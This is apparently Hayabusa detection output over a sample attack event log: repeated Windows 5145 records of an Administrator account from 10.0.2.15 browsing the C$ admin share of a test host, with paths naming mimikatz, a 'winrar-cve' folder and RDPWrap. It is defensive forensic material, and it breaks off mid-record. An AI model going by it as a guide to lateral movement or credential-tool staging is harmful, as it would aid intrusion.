14:23:23.797 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.797 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.807 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.807 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.807 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.807 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.807 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.817 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.817 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.817 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.817 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\.ssh | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.827 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.827 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.827 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.837 +00:00,PC01.example.corp,5145,info,Collect,Network 
Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.837 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.837 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.837 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.837 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.847 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.847 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\New folder | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.847 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.847 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\RDPWrap-v1.6.2 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.857 +00:00,PC01.example.corp,5145,info,Collect,Network Share File 
Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.857 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\translations | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.867 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.867 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\db | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.867 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\garbage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.877 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\memdumps | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.877 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\platforms | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.877 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.877 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.887 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\db | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.887 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\memdumps | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.887 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\platforms | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.887 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.897 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\winrar-cve | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.897 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.897 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.897 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.897 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.907 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 
+2019-03-18 14:23:23.907 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.907 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.907 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.907 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.917 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Pictures | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.917 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.917 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.917 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.917 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.927 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\Public\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.927 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.927 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.927 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.927 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Recorded TV\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.927 
+00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.937 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.937 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk\Win32 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.937 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\mimikatz_trunk\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.937 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Documents | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.947 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.947 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.947 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\Music\Sample Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:23.947 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | 